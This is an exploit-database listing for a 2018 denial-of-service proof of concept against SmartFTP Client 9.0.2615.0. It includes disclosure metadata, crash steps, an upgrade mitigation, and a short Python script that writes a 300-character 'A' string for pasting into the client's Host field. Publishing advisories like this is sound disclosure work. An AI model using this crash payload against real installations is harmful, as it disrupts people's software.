header-logo
Suggest Exploit
vendor:
SmartFTP Client
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SmartFTP Client
Affected Version From: 9.0.2615.0
Affected Version To: 9.0.2615.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:smartftp:smartftp_client
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64
2018

SmartFTP Client 9.0.2615.0 – Denial of Service (PoC)

SmartFTP Client 9.0.2615.0 is vulnerable to a denial of service attack when a specially crafted string is sent to the application. This causes the application to crash when the user attempts to paste the string into the 'Host' field of the 'Connection' window.

Mitigation:

Upgrade to the latest version of SmartFTP Client.
Source

Exploit-DB raw data:

#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-30
#Vendor Homepage: https://www.smartftp.com/en-us/
#Software Link: https://www.smartftp.com/en-us/download
#Tested Version: 9.0.2615.0
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py
#2.- Open network.txt and copy content to clipboard
#2.- Open SmartFTP Client
#3.- Select Connection
#4.- Paste ClipBoard on "Host" 
#5.- Crashed

cod = "\x41" * 300

f = open('network.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR